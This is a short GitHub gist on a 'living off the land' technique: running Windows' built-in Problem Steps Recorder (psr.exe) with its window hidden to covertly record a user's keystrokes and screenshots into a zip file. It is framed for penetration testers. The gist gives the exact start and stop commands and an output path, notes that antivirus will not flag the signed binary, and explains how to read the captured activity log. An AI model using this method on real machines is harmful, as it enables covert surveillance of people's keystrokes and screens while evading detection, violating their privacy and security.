Skip to content

Instantly share code, notes, and snippets.

@TartarusLabs
Created April 21, 2022 21:31
Show Gist options
  • Save TartarusLabs/06abcaeae7cce01552243a437917e6be to your computer and use it in GitHub Desktop.
Save TartarusLabs/06abcaeae7cce01552243a437917e6be to your computer and use it in GitHub Desktop.
Living off the Land method for logging keystrokes and taking screenshots using Problem Steps Recorder built-in Windows utility psr.exe
Windows workstations have a built-in utility called Problem Steps Recorder that can be used covertly by penetration testers to record keystrokes and screenshots of user activity. There is no risk of AV flagging this since it is a signed Microsoft binary.
To start logging the user's activity:
psr.exe /start /gui 0 /output C:\Users\user\AppData\Local\log.zip
To stop logging:
psr.exe /stop
Once the process is stopped, the zip file will be created.
The zip will contain a single MHTML Web Archive with filename in the format of Recording_YYYYMMDD_HHmm.mht
Opening this file in a web browser will reveal a detailed log of all user activity for as long as PSR was running, including screenshots and keystrokes.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment